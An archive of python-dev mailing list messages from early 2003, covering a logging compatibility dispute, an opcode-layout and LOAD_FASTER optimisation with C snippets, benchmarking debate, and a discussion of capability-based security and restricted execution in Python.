`Some questions about maintenance of the regular expression code.
<http://mail.python.org/pipermail/python-dev/2003-February/033699.html>`__:
`New regex syntax?
<http://mail.python.org/pipermail/python-dev/2003-February/033735.html>`__
    Gary Herron stepped up to say he was interested in taking over
maintenance of the re_ module.  He asked, though, how to handle bug
reports about ``(.*)?`` and hitting the recursion limit (a patch
materialized that solved the recursion issue for non-greedy quantifiers
for the common case).  The suggestion of coming up with a new syntax for
regexes came up but was stopped from forming on the list since that would
take "over all available bandwidth in python-dev" as Guido pointed out.
Can still be discussed in other forums, though...

`bug? classes whose metclass has __del__ are not collectible
<http://mail.python.org/pipermail/python-dev/2003-February/033764.html>`__
    Answer: no.  Reason: "The GC implementation has a good reason for
this; someone else may be able to explain it".

`Introducing Python
<http://mail.python.org/pipermail/python-dev/2003-February/033783.html>`__
    Gustavo Niemeyer sent a link to an mpeg promoting Python at
http://www.ibiblio.org/obp/pyBiblio/pythonvideo.php .  If you ever had any
desire to see what some of the guys from PythonLabs look and sound like
and you are not going to PyCon_ you can now quench your curiosity.

`syntax for funcion attributes
<http://mail.python.org/pipermail/python-dev/2003-February/033800.html>`__
    Someone suggested a new syntax for being able to access function attributes
but was told that it didn't look like it would fly.


.. _Jython: http://www.jython.org/
.. _PEP 308: http://www.python.org/peps/pep-0308.html
.. _PyErr_WarnExplicit(): http://www.python.org/dev/doc/devel/api/exceptionHandling.html#l2h-92
.. _FixedPoint: http://fixedpoint.sf.net/
.. __iconv_codec.c: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/_iconv_codec.c?sortby=date
.. _ctypes: http://starship.python.net/crew/theller/ctypes.html
.. _re: http://www.python.org/dev/doc/devel/lib/module-re.html
.. _bsddbmodule.c: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Modules/bsddbmodule.c
.. _sys.exc_info(): http://www.python.org/dev/doc/devel/lib/module-sys.html
.. _email: http://www.python.org/dev/doc/devel/lib/module-email.html
.. _PEP 311: http://www.python.org/peps/pep-0311.html
.. _test_re: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/python/dist/src/Lib/test/test_re.py


From tismer@tismer.com  Sun Mar  2 03:24:28 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sun, 02 Mar 2003 04:24:28 +0100
Subject: [Python-Dev] Re: Traceback problem
In-Reply-To: <200303010340.h213etD23813@pcp02138704pcs.reston01.va.comcast.net>
References: <Pine.LNX.4.44.0302251816460.15794-100000@penguin.theopalgroup.com> <200302260124.h1Q1O7D16232@pcp02138704pcs.reston01.va.comcast.net> <3E5C290B.9010802@tismer.com> <200303010152.h211qwZ11517@pcp02138704pcs.reston01.va.comcast.net> <b3p95n$bd8$1@main.gmane.org> <200303010340.h213etD23813@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E61796C.4070505@tismer.com>

Guido van Rossum wrote:
> Great!  Hope this message has shed some additional light.

It would have, of course, two years earlier.
When I wrote my message, I already had triple-checked
that there was no way to contradict me :-)

> It would be a shame for this to be lost in the archives.  If there
> were a directory of  ImplementationNotes somewhere (or an interpreter
> wiki), this would belong there.  And responders to "where are the docs
> on the implementation" could be told more than "read the source".

Put the whole message into the comments, and all is just fine.

> Good idea.  I hate separating implementation notes from the code by
> more than absolutely necessary (Zope's cobweb of Wikis drives me nuts
> :-), so I added the essence of that message to ceval.c as a big
> comment block.

Hey, that's just great!
Guess how often I had to re-read that code,
finally concluding that it is all-right that
way, but always thinking that I could have
saved quite some time by taking some notes :-)

The hardest thing to remember always was the fact
that the callee is saving the caller's state for
the exceptions. I always have to go through analysis
again to get it right, and I always think this is
not the way it should be.

but-this-keeps-me-young -- cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From skip@manatee.mojam.com  Sun Mar  2 13:00:30 2003
From: skip@manatee.mojam.com (Skip Montanaro)
Date: Sun, 2 Mar 2003 07:00:30 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303021300.h22D0Un0002864@manatee.mojam.com>

Bug/Patch Summary
-----------------

342 open / 3393 total bugs (-16)
125 open / 1999 total patches (+5)

New Bugs
--------

Let assign to as raise SyntaxWarning as well (2003-02-23)
	http://python.org/sf/691733
LibRef 4.2.1: {m,n} description update (2003-02-23)
	http://python.org/sf/692016
tkinter.createfilehandler dumps core (2003-02-24)
	http://python.org/sf/692416
new.function() leads to segfault (2003-02-25)
	http://python.org/sf/692776
python always searches python23.zip (2003-02-25)
	http://python.org/sf/692884
new.function ignores keyword arguments (2003-02-25)
	http://python.org/sf/692959
Python does not build --with-pydebug on Tru64 with vendor cc (2003-02-25)
	http://python.org/sf/693094
2.3a2 site.py non-existing dirs (2003-02-25)
	http://python.org/sf/693255
2.3a2 import after os.chdir difference (2003-02-25)
	http://python.org/sf/693416
licence allowed, but doesn't work (2003-02-25)
	http://python.org/sf/693470
Can't multiply str and bool (2003-02-26)
	http://python.org/sf/693955
email.Parser trashes header (2003-02-26)
	http://python.org/sf/693996
os.popen() hangs on {Free,Open}BSD (2003-02-26)
	http://python.org/sf/694062
Python 2.3a2 Build fails on HP-UX11i (2003-02-27)
	http://python.org/sf/694431
setup.py imports pwd before it's built if HOME not set (2003-02-27)
	http://python.org/sf/694812
complex_new does not always respect subtypes (2003-03-01)
	http://python.org/sf/695651
Problems with non-greedy match groups (2003-03-01)
	http://python.org/sf/695688

New Patches
-----------

Use datetime in _strptime (2003-02-23)
	http://python.org/sf/691928
fix bug 625698, speed up some comparisons (2003-02-25)
	http://python.org/sf/693221
fix for bug 639806: default for dict.pop (2003-02-26)
	http://python.org/sf/693753
fix for bug 672614 :) (2003-02-28)
	http://python.org/sf/695250
environment parameter for popen2 (2003-02-28)
	http://python.org/sf/695275
fix bug 678519: cStringIO self iterator (2003-03-01)
	http://python.org/sf/695710

Closed Bugs
-----------

Compiler complaints in posixmodule.c (2001-11-28)
	http://python.org/sf/486434
import with undefineds can crash python (2001-12-02)
	http://python.org/sf/488184
mkcwproject: custom __initialize routine (2001-12-13)
	http://python.org/sf/492465
macfs.FSSpec and Carbon.File.FSSpec fail for "new" files (2002-07-24)
	http://python.org/sf/585923
OSA Python integration (2002-07-26)
	http://python.org/sf/586998
IDE should have "open recent" menu (2002-09-11)
	http://python.org/sf/607810
IDE output window (2002-09-11)
	http://python.org/sf/607821
IDE - Breakpoints don't stick to lines (2002-09-11)
	http://python.org/sf/608085
unicode alphanumeric regexp bug (2002-09-16)
	http://python.org/sf/610299
Reorganize MacPython resources on OSX (2002-10-19)
	http://python.org/sf/625725
remove debug prints from macmain.c (2002-11-08)
	http://python.org/sf/635570
ic module "path too long" error (2002-11-26)
	http://python.org/sf/644243
dynload_next needs better errors (2002-12-12)
	http://python.org/sf/652590
Compiling C sources with absolute path bug (2003-01-15)
	http://python.org/sf/668662
after using pdb readline does not work correctly (2003-01-28)
	http://python.org/sf/676342
Can't build C ext on OS X with 'altinstall' python (2003-01-29)
	http://python.org/sf/677293
python.exe expected in extension builds (2003-01-30)
	http://python.org/sf/677753
plistlib.py selftest fails (2003-02-07)
	http://python.org/sf/682317
Future division breaks mpz (2003-02-16)
	http://python.org/sf/687654
Bundlebuilder needs to pre-convert resource files (2003-02-17)
	http://python.org/sf/688007
macresource should handle readonly applesingle files (2003-02-17)
	http://python.org/sf/688011
IDLE does not work on Mac OS X (2003-02-17)
	http://python.org/sf/688266
64-bit int and long hash keys incompatible (2003-02-19)
	http://python.org/sf/689659
Docs page has no PEPs link (2003-02-19)
	http://python.org/sf/689826
2.3a2 build fails under IRIX 6.5 (2003-02-20)
	http://python.org/sf/690012
test_posix fails when run in non-interactive mode (2003-02-20)
	http://python.org/sf/690081
sys.last_type is missing (2003-02-20)
	http://python.org/sf/690109
lines run together on input (2003-02-20)
	http://python.org/sf/690285
2.3a2 Sol8 make fails at _iconv_codec. (2003-02-20)
	http://python.org/sf/690309
apply fails to check if warning raises exception (2003-02-20)
	http://python.org/sf/690435
_POSIX_C_SOURCE redefined (2003-02-21)
	http://python.org/sf/691005
shutil.copytree documentation bug (2003-02-22)
	http://python.org/sf/691276
codecs.open(filename, 'U', 'UTF-16') corrupts text (2003-02-22)
	http://python.org/sf/691291

Closed Patches
--------------

Patch for sre bug 610299 (2002-11-04)
	http://python.org/sf/633359
array.append is sloooow (2003-02-16)
	http://python.org/sf/687598
2.3 .spec file for building RPMs. (2003-02-18)
	http://python.org/sf/688584


From vinay_sajip@red-dove.com  Sun Mar  2 14:33:05 2003
From: vinay_sajip@red-dove.com (Vinay Sajip)
Date: Sun, 2 Mar 2003 14:33:05 -0000
Subject: [Python-Dev] Changes to logging in CVS
Message-ID: <006801c2e0c8$a4227d80$652b6992@alpha>

I see that recent changes were made in logging/__init__.py to replace the
use of "apply(func, args)" with "func(*args)". Doesn't this cause "invalid
syntax" problems with 1.5.2? I explicitly coded using apply because I
thought it was needed for 1.5.2. There are a few places where I've eschewed
use of +=, for the same reason. Any chance we could change back to using
apply()?
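
For readers who have not seen both spellings side by side, here is a
minimal sketch of the idioms in question. It is written for a current
Python, where the builtin apply() no longer exists, so apply_compat and
log_line are hypothetical names used only for illustration; they are not
part of the logging package.

```python
def apply_compat(func, args=(), kwargs=None):
    """Hypothetical stand-in for the old builtin apply(func, args, kwargs)."""
    if kwargs is None:
        kwargs = {}
    return func(*args, **kwargs)


def log_line(level, msg, sep=": "):
    """Toy function to call; not a real logging API."""
    return level + sep + msg


args = ("INFO", "started")

# What "apply(log_line, args)" computed in the 1.5.2-compatible code.
old_style = apply_compat(log_line, args)

# The star spelling that replaced it, which the 1.5.2 compiler rejects.
new_style = log_line(*args)

# The 1.5.2-safe way of writing "count += 1".
count = 0
count = count + 1
```

Both calls produce the same result; the only difference is whether the
source file can be compiled by the older interpreter.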

Regards

Vinay


From mal@lemburg.com  Sun Mar  2 19:23:26 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 02 Mar 2003 20:23:26 +0100
Subject: [Python-Dev] Changes to logging in CVS
In-Reply-To: <006801c2e0c8$a4227d80$652b6992@alpha>
References: <006801c2e0c8$a4227d80$652b6992@alpha>
Message-ID: <3E625A2E.1040508@lemburg.com>

Vinay Sajip wrote:
> I see that recent changes were made in logging/__init__.py to replace the
> use of "apply(func, args)" with "func(*args)". Doesn't this cause "invalid
> syntax" problems with 1.5.2? I explicitly coded using apply because I
> thought it was needed for 1.5.2. There are a few places where I've eschewed
> use of +=, for the same reason. Any chance we could change back to using
> apply()?

You should mark the files you need 1.5.2 compatibility for in the
source code. Even though PEP 291 mentions your package, I don't
think that everybody knows about this PEP...

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 02 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     30 days left
EuroPython 2003, Charleroi, Belgium:                       114 days left


From vinay_sajip@red-dove.com  Sun Mar  2 19:39:16 2003
From: vinay_sajip@red-dove.com (Vinay Sajip)
Date: Sun, 2 Mar 2003 19:39:16 -0000
Subject: [Python-Dev] Changes to logging in CVS
References: <006801c2e0c8$a4227d80$652b6992@alpha> <3E625A2E.1040508@lemburg.com>
Message-ID: <000f01c2e0f3$6a7dcfa0$652b6992@alpha>

> > I see that recent changes were made in logging/__init__.py to replace the
> > use of "apply(func, args)" with "func(*args)". Doesn't this cause "invalid
> > syntax" problems with 1.5.2? I explicitly coded using apply because I
> > thought it was needed for 1.5.2. There are a few places where I've eschewed
> > use of +=, for the same reason. Any chance we could change back to using
> > apply()?
>
> You should mark the files you need 1.5.2 compatibility for in the
> source code. Even though PEP 291 mentions your package, I don't
> think that everybody knows about this PEP...

Fair enough, but the docstring at the top of __init__.py states:

"Should work under Python versions >= 1.5.2, except that source line
information is not available unless 'sys._getframe()' is."

Do you mean that I need to mention this wherever the source code contains
some 1.5.2-constrained idiom like "apply(func, args)" or "a = a + 1", so
that it's explicit that it was coded that way for a reason?

Regards,

Vinay


From guido@python.org  Sun Mar  2 20:42:37 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 02 Mar 2003 15:42:37 -0500
Subject: [Python-Dev] Re: Changes to logging in CVS
In-Reply-To: "Your message of Sun, 02 Mar 2003 14:33:05 GMT."
 <006801c2e0c8$a4227d80$652b6992@alpha>
References: <006801c2e0c8$a4227d80$652b6992@alpha>
Message-ID: <200303022042.h22KgbX18847@pcp02138704pcs.reston01.va.comcast.net>

> I see that recent changes were made in logging/__init__.py to
> replace the use of "apply(func, args)" with "func(*args)". Doesn't
> this cause "invalid syntax" problems with 1.5.2? I explicitly coded
> using apply because I thought it was needed for 1.5.2. There are a
> few places where I've eschewed use of +=, for the same reason. Any
> chance we could change back to using apply()?

My apologies.  I forgot about this.  I'll roll it back.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tismer@tismer.com  Sun Mar  2 21:06:40 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sun, 02 Mar 2003 22:06:40 +0100
Subject: [Python-Dev] __slots__ for metatypes
Message-ID: <3E627260.5050807@tismer.com>

Hi Guido, all,

last year, I wrote a patch that allows meta-types to have
slots. You had no time to look into it, and I said
"take your time and wait until it is stable".

I have been using this for quite a while now,
and today I updated it for Python 2.3 .
The patch is very small and simple.
Essentially, it doesn't use a fixed offset into the
internal etype structure, but computes this based upon
tp_basicsize.

This small patch also gives lots of flexibility to people
who like to add extra stuff to their dynamic type objects.
(Well, I do this frequently)

It would be nice if we could add this small feature, soon.

http://www.python.org/sf/696193

Due to some SF bug, I had to submit this patch twice.

thanks a lot - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From newsgroups1@bitfurnace.com  Mon Mar  3 01:55:57 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Sun, 2 Mar 2003 20:55:57 -0500
Subject: [Python-Dev] Re: new bytecode results
References: <001301c2def2$09d374a0$6401a8c0@damien> <3E5F2260.3080808@lemburg.com> <b3o4ti$nsl$1@main.gmane.org> <b3re2i$rad$1@main.gmane.org>
Message-ID: <b3ud1u$ee4$1@main.gmane.org>

I optimised the layout of the python opcodes using a simulated annealing
process that scored adjacent opcodes according to their frequency of
co-occurrence.

This raised my PyStone benchmark from 22100 to 22700, for a 3% gain.
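
The general shape of such an annealing run can be sketched in Python.
This is only an illustration under assumptions: the cost function
(co-occurrence count times distance in the layout), the swap move, the
cooling schedule, and the pair counts are all made up here and are not
the actual procedure or data used for the numbers above.

```python
import math
import random


def layout_cost(order, pair_freq):
    """Sum of count * distance over all co-occurring opcode pairs (assumed score)."""
    pos = {op: i for i, op in enumerate(order)}
    return sum(f * abs(pos[a] - pos[b]) for (a, b), f in pair_freq.items())


def anneal_layout(opcodes, pair_freq, steps=5000, t_start=10.0, t_end=0.01, seed=0):
    """Search for a low-cost ordering by randomly swapping two opcodes."""
    rng = random.Random(seed)
    order = list(opcodes)
    cost = layout_cost(order, pair_freq)
    best, best_cost = order[:], cost
    for step in range(steps):
        # Geometric cooling from t_start down towards t_end.
        temp = t_start * (t_end / t_start) ** (step / steps)
        i, j = rng.sample(range(len(order)), 2)
        order[i], order[j] = order[j], order[i]
        new_cost = layout_cost(order, pair_freq)
        # Always accept improvements; accept worse layouts with a
        # probability that shrinks as the temperature drops.
        if new_cost <= cost or rng.random() < math.exp((cost - new_cost) / temp):
            cost = new_cost
            if cost < best_cost:
                best, best_cost = order[:], cost
        else:
            order[i], order[j] = order[j], order[i]  # undo the swap
    return best, best_cost


# Made-up co-occurrence counts, for illustration only.
pair_freq = {
    ("LOAD_FAST", "LOAD_ATTR"): 90,
    ("LOAD_ATTR", "CALL_FUNCTION"): 70,
    ("LOAD_FAST", "STORE_FAST"): 40,
    ("BINARY_ADD", "STORE_FAST"): 30,
}
opcodes = ["BINARY_ADD", "CALL_FUNCTION", "LOAD_FAST",
           "STORE_FAST", "LOAD_ATTR", "POP_TOP"]
best_order, best_cost = anneal_layout(opcodes, pair_freq)
```

The function keeps the best layout seen so far, so the result is never
worse than the starting order under the chosen score.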

I've been using Skip's DXP server to gather statistics, but there isn't much
data there. I should be able to achieve better results if more people
contributed stats to his server, more information about which can be found
here:
http://manatee.mojam.com/~skip/python/

The process of laying out the opcodes and switch cases has largely been
automated, and generating new layouts is relatively painless and quick. Do
please contribute stats for 2.3a2 to Skip's DXP server.

I also implemented a LOAD_FASTER opcode, with the argument encoded into the
opcode.

This raised my PyStone benchmark from 22700 to 23150, for a total 5% gain.

The main switch loop looks like this now:

if (opcode >= LOAD_FASTER) {
  load_fast(opcode - LOAD_FASTER);
  ...
  goto fast_next_opcode;
  }
switch(opcode) {
  case LOAD_ATTR:
    oparg = NEXTARG();
    w = GETITEM(names, oparg);
    ...
    break;
  ...
}

Each opcode case now loads its own argument as necessary. The test for
HAVE_ARGUMENT is now implemented using an array of bytes. The test now
happens very infrequently, so any performance loss is negligible.

const char HASARG[] = {
  0 , /* STOP_CODE */
  1 , /* LOAD_ATTR */
  1 , /* CALL_FUNCTION */
  1 , /* STORE_FAST */
  0 , /* BINARY_ADD */
  0 , /* SLICE+0 */
  0 , /* SLICE+1 */
  0 , /* SLICE+2 */
...
}
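
To make the encoding concrete, here is a small Python model of how a
tool stepping over such bytecode might decode it. The opcode numbers,
the value 128 for LOAD_FASTER, and the two-byte little-endian argument
are assumptions for this sketch and do not come from the patch itself.

```python
# Hypothetical opcode numbering, for illustration only.
STOP_CODE, LOAD_ATTR, CALL_FUNCTION, STORE_FAST, BINARY_ADD = range(5)
NAMES = ["STOP_CODE", "LOAD_ATTR", "CALL_FUNCTION", "STORE_FAST", "BINARY_ADD"]

# Opcodes at or above this value carry the local-variable index themselves.
LOAD_FASTER = 128

# 1 if the opcode is followed by an argument, 0 otherwise (same idea as HASARG[]).
HASARG = [0, 1, 1, 1, 0]


def decode(code):
    """Return a list of (name, arg) pairs for a bytes object of toy bytecode."""
    result = []
    i = 0
    while i < len(code):
        opcode = code[i]
        i += 1
        if opcode >= LOAD_FASTER:
            # The argument is encoded into the opcode; nothing more to read.
            result.append(("LOAD_FASTER", opcode - LOAD_FASTER))
            continue
        if HASARG[opcode]:
            # Assumed layout: two-byte argument, low byte first.
            arg = code[i] | (code[i + 1] << 8)
            i += 2
        else:
            arg = None
        result.append((NAMES[opcode], arg))
    return result


program = bytes([LOAD_FASTER + 2, LOAD_ATTR, 5, 0, BINARY_ADD, STORE_FAST, 1, 1])
decoded = decode(program)
```

In the eval loop itself the table lookup is avoided because each case
fetches its own argument; a table like this is mainly useful for code
that has to skip over instructions without executing them.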


From tim.one@comcast.net  Mon Mar  3 04:06:30 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 02 Mar 2003 23:06:30 -0500
Subject: [Python-Dev] Re: new bytecode results
In-Reply-To: <A32C76BE-4B34-11D7-9319-003065ABC53C@pacbell.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEBDEAAB.tim.one@comcast.net>

[Dan Wolfe]
> In the last year of lurking on this list, I've seen requests for a good
> python benchmark no less than 4 times - the most recent being damien
> morton's attempt to prove/disprove his optimizations.
>
> Having an "approved" good benchmark/realistic test program would make
> it easy to validate optimizations, and head off the consistent 'pystone
> is not a realistic benchmark' arguments that come up each time....

pystone is a very good benchmark for one thing:  testing the "general speed"
of the interpreter.  Perhaps because it *is* so atypical, it's hard to do
something that gives pystone a significant speed boost.  Rewriting the eval
loop several years ago managed to do that, and ruthlessly cutting slop out
of the dict implementation gave it an 8% boost more recently.  I can't
recall any other single thing that helped pystone as much as those.  Jim
Fulton claims that pystone is a good predictor of Zope speed on a new box,
and now that I know more about Zope than I used to, I believe that:  while
Zope may look like Python code, there are so many meta-tricks being played
under the covers that it's plausible that the only thing that really matters
is how fast you can get around the eval loop.

Anyway, several years ago I offered to collect and organize a set of
"typical" benchmarks.  Nobody responded, so that turned out to be a lot
easier than I thought it would be <wink>.

> Besides, it will take 6 months just to agree to a basic framework,
> and another 6 months to work around all the "competitive optimization
> tricks" timbot has up his sleeve...

You can't help it.  If you know the code in advance, the implementation
*will* get warped to favor it.  The best you can hope for is that warping
won't be done at the expense of other code.  For example, if you decide to
reorder the eval loop case statements, and use pystone as your measure of
goodness, you'll end up with a different order than if you use test_descr.py
as your measure.  Is that cheating?  I suppose it depends on who's doing it
<wink>.


From tim.one@comcast.net  Mon Mar  3 04:14:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 02 Mar 2003 23:14:55 -0500
Subject: [Python-Dev] module extension search order - can it be changed?
In-Reply-To: <2m7kbk30li.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBEEAAB.tim.one@comcast.net>

[Michael Hudson]
> While we're at it, linecache's charming habit of occasionally giving
> out of date information is Pure Evil.  Performance my arse, lying to
> the user is worse.

We don't use linecache often, and I've never tried comparative timing (with
and without it).  Offhand it's hard to believe that producing tracebacks
benefits from it, or that inspect.py does.  For 2.3b1, maybe we could change
linecache.updatecache() to leave the cache empty and see whether anyone
notices <0.7 wink>.
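
The stale-data behaviour is easy to reproduce. A minimal sketch, using
only linecache.getline(), linecache.checkcache() and
linecache.clearcache(); the temporary file and its contents are made up
for the demonstration.

```python
import linecache
import os
import tempfile

fd, path = tempfile.mkstemp(suffix=".py")
os.close(fd)
try:
    with open(path, "w") as f:
        f.write("x = 1\n")
    first = linecache.getline(path, 1)   # reads the file and caches its lines

    # Change the file on disk (the new content has a different size).
    with open(path, "w") as f:
        f.write("x = 'changed on disk'\n")
    stale = linecache.getline(path, 1)   # still answered from the cache

    linecache.checkcache(path)           # drops entries whose size or mtime changed
    fresh = linecache.getline(path, 1)   # re-read from disk
finally:
    os.remove(path)
    linecache.clearcache()
```

Until checkcache() is called, the second lookup returns the old line
even though the file has changed.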


From python@rcn.com  Mon Mar  3 04:57:01 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 2 Mar 2003 23:57:01 -0500
Subject: [Python-Dev] Re: new bytecode results
References: <LNBBLJKPBEHFEDALKOLCEEBDEAAB.tim.one@comcast.net>
Message-ID: <003f01c2e141$53f6c400$125ffea9@oemcomputer>

From: "Tim Peters" <tim.one@comcast.net>
> [Dan Wolfe]
> > In the last year of lurking on this list, I've seen requests for a good
> > python benchmark no less than 4 times - the most recent being damien
> > morton's attempt to prove/disprove his optimizations.
> >
> > Having an "approved" good benchmark/realistic test program would make
> > it easy to validate optimizations, and head off the consistent 'pystone
> > is not a realistic benchmark' arguments that come up each time....
> 
> pystone is a very good benchmark for one thing:  testing the "general speed"
> of the interpreter.  Perhaps because it *is* so atypical, it's hard to do
> something that gives pystone a significant speed boost

I've been working with Damien to make sure the improvements
are not pystone specific.  We've run against my highly optimized
matrix code, against pybench, and against another one of my
programs which heavily exercises a broad range of python tools.

Overall, his improvements have helped across the board.
I think his latest and greatest should be accepted unless
there is a maintainability hit.  However, the core concept
and code seems clean enough to me.

FWIW,


Raymond Hettinger


From ben@algroup.co.uk  Mon Mar  3 13:42:43 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 03 Mar 2003 13:42:43 +0000
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <15933.30607.900530.370402@localhost.localdomain>
References: <15930.48758.62473.425111@slothrop.zope.com>	<Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain>
Message-ID: <3E635BD3.9000107@algroup.co.uk>

My attention was drawn to this unanswered email, so here goes...

Jeremy Hylton wrote:
>>>>>>"KPY" == Ka-Ping Yee <ping@zesty.ca> writes:
> 
> 
>   KPY> Wow, how did this topic end up crossing over to this list while
>   KPY> i wasn't looking?  :0
> 
> You sure react quick for someone who isn't looking <wink>.
> 
>   >> A capability system must have some rules for creating and copying
>   >> capabilities, but there is more than one way to realize those
>   >> rules in a programming language.
> 
>   KPY> I suppose there could be, but there is really only one obvious
>   KPY> way: creating a capability is equivalent to creating an object
>   KPY> -- which you can only do if you hold the constructor.  A
>   KPY> capability is copied into another object (for the security
>   KPY> folks, "object" == "protection domain") when it is transmitted
>   KPY> as an argument to a method call.
> 
>   KPY> To build a capability system, all you need to do is to
>   KPY> constrain the transfer of object references such that they can
>   KPY> only be transmitted along other object references.  That's all.
> 
> I don't follow you here.  What does it mean to "transmit along other
> object references?"  That is, everything in Python is an object and
> the only kind of references that exist are object references.

He's actually going slightly in circles here. The idea is that in order 
to acquire an object reference you either create the object, or are 
given the reference by another object you already have a reference to, 
or are given it by another object that has a reference to you. Where 
"you" is some object, of course.

What is _not_ supposed to happen is finding objects by poking around in 
the symbol table, for example.

> I think, based on the rest of your mail, that we're largely on
> the same page, but I'd like to make sure I understand where you're
> coming from.
> 
> I don't quite follow the definition of protection domain either, as
> most of the literature I'm familiar with (not much of it about
> capabilities specifically) talks about a protection domain as the set
> of objects a principal has access to.  The natural way to extend that
> to capabilities seems to me to be that a protection domain is the set
> of capabilities possessed by a principal.

That sounds right. The transitive closure of the capabilities possessed 
by a principal is also interesting, though the code in the objects 
determines whether you have access to any particular member of that set 
in practice.

> Are these questions off-topic for python-dev?
> 
> At any rate, it still seems like there are a variety of ways to
> realize capabilities in a programming language.  For example, ZODB
> uses a special base class called Persistent to mark persistent
> objects.  One could imagine using the same approach so that only some
> objects have capabilities associated with them.

This was the approach I took initially but it's substantially more messy 
than using bound methods.
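
As a rough illustration of the bound-method idea (a sketch only; the
Counter class and untrusted_client function are hypothetical names, and
this is not the code under discussion): handing out a single bound
method gives the receiver one operation rather than the whole object,
but ordinary Python introspection undoes that.

```python
class Counter:
    """Object whose methods we want to hand out individually."""

    def __init__(self):
        self._value = 0

    def increment(self):
        self._value += 1
        return self._value

    def reset(self):
        self._value = 0


def untrusted_client(bump):
    """Receives only the 'increment' capability, not the Counter itself."""
    bump()
    return bump()


counter = Counter()
result = untrusted_client(counter.increment)

# In unrestricted Python the bound method still exposes its object,
# so the holder could reach reset() after all.
leaked = counter.increment.__self__ is counter
```

The last line is the reason the approach needs introspection to be
restricted before it can be called a capability system.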

>   KPY> The problem for Python, as Jeremy explained, is that there are
>   KPY> so many other ways of crawling into objects and pulling out
>   KPY> bits of their internals.
> 
>   KPY> Off the top of my head, i only see two things that would have
>   KPY> to be fixed to turn Python into a capability-secure system:
> 
>   KPY> 1. Access to each object is limited to its declared exposed
>   KPY>      interface; no introspection allowed.
> 
>   KPY> 2. No global namespace of modules (sys.modules etc.).
> 
>   KPY> If there is willingness to consider a "secure mode" for Python
>   KPY> in which these two things are enforced, i would be interested
>   KPY> in making it happen.
> 
> I think there is interest and I agree with your problem statement.
> I'd rephrase 2 to make it more general.  Control access to other
> modules.  The import statement is just as much of a problem as
> sys.modules, right?  In a secure environment, you have to control what
> code can be loaded in the first place.

Correct.

>   >> In Python, there is no private.
> 
>   KPY> Side note (probably irrelevant): in some sense there is, but
>   KPY> nobody uses it.  Scopes are private.  If you were to implement
>   KPY> classes and objects using lambdas with message dispatch
>   KPY> (i.e. the Scheme way, instead of having a separate "class"
>   KPY> keyword), then the scoping would take care of all the
>   KPY> private-ness for you.
> 
> I was aware of Rees's dissertation when I did the nested scopes and,
> partly as a result, did not provide any introspection mechanism for
> closures.  That is, you can get at a function's func_closure slot but
> there's no way to look inside the cells from Python.  I was thinking
> that closures could replace Bastions.  It still seems possible, but
> on several occasions I've wished I could introspect about closures
> from Python code.  I'm also unsure that the idea flies so well for
> Python, because you really want secure Python to be as much like
> regular Python as possible.  If the mechanism is based on functions,
> it seems hard to make it work naturally for classes and instances.
> 
>   >> The Zope proxy approach seems a little more promising, because it
>   >> centralizes all the security machinery in one object, a security
>   >> proxy.  A proxy for an object can appear virtually
>   >> indistinguishable for the object itself, except that type(proxy)
>   >> != type(object_being_proxied).  The proxy guarantees that any
>   >> object returned through the proxy is wrapped in its own proxy,
>   >> except for simple immutable objects like ints or strings.
> 
>   KPY> The proxy mechanism is interesting, but not for this purpose.
>   KPY> A proxy is how you implement revocation of capabilities: if you
>   KPY> insert a proxy in front of an object and grant access to that
>   KPY> proxy, then you can revoke the access just by telling the proxy
>   KPY> to stop responding.
> 
> Sure, you can use proxies for revocation, but that's not what I was
> trying to say.
> 
> I think the fundamental problem for rexec is that you don't have a
> security kernel.  The code for security gets scattered throughout the
> interpreter.  It's hard to have much assurance in the security when
> it's tangled up with everything else in the language.
> 
> You can use a proxy for an object to deal with goal #1 above --
> enforce an interface for an object.  I think about this much like a
> hardware capability architecture.  The protected objects live in the
> capability segment and regular code can't access them directly.  The
> only access is via a proxy object that is bound to the capability.
> 
> Regardless of proxy vs. rexec, I'd be interested to hear what you
> think about a sound way to engineer a secure Python.

I'm told that proxies actually rely on rexec, too. So, I guess whichever 
approach you take, you need rexec.

The problem is that although you can think about proxies as being like a 
segmented architecture, you have to enforce that segmentation. And that 
means doing so throughout the interpreter, doesn't it? I suppose it 
